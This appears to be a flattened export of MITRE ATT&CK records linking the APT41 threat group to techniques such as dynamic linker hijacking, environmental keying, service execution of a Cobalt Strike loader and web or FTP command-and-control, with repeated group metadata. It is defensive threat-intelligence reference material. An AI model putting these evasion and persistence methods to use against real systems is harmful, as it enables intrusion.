external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has configured payloads to load via LD_PRELOAD.(Citation: Crowdstrike GTR2020 Mar 2020)	
relationship_id : relationship--7f9fe6d5-79ba-44ca-bf19-c980e5c2fc11
revoked : False
technique : Dynamic Linker Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.006
matrix : mitre-attack
platform : ['Linux', 'macOS']
data_sources : ['File: File Creation', 'Command: Command Execution', 'Module: Module Load', 'Process: Process Creation', 'File: File Modification']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)
relationship_id : relationship--5212a108-111b-4467-84c9-933d2b84aad2
revoked : False
technique : Environmental Keying
technique_description : Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1480.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) 
relationship_id : relationship--4aa86179-d9e9-43dd-b2a2-75e77a832150
revoked : False
technique : Web Protocols
technique_description : Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used  svchost.exe and [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--84dc2fd1-a443-4ce6-866a-c58cffc1b0f3
revoked : False
technique : Service Execution
technique_description : Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1569.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) executed <code>file /bin/pwd</code> in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--a8b93875-6ad4-492e-afa1-0549ada7d7ca
revoked : False
technique : Unix Shell
technique_description : Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.004
matrix : mitre-attack
platform : ['macOS', 'Linux']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
permissions_required : ['User', 'root']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has executed <code>file /bin/pwd</code> on exploited victims, perhaps to return architecture related information.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--d9416afb-0aeb-4ee3-bd96-dc331f40f37d
revoked : False
technique : File and Directory Discovery
technique_description : Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1083
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [ftp](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)
relationship_id : relationship--2cd69fd0-d5ad-41db-aaee-fd58e46bfaaa
revoked : False
technique : File Transfer Protocols
technique_description : Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
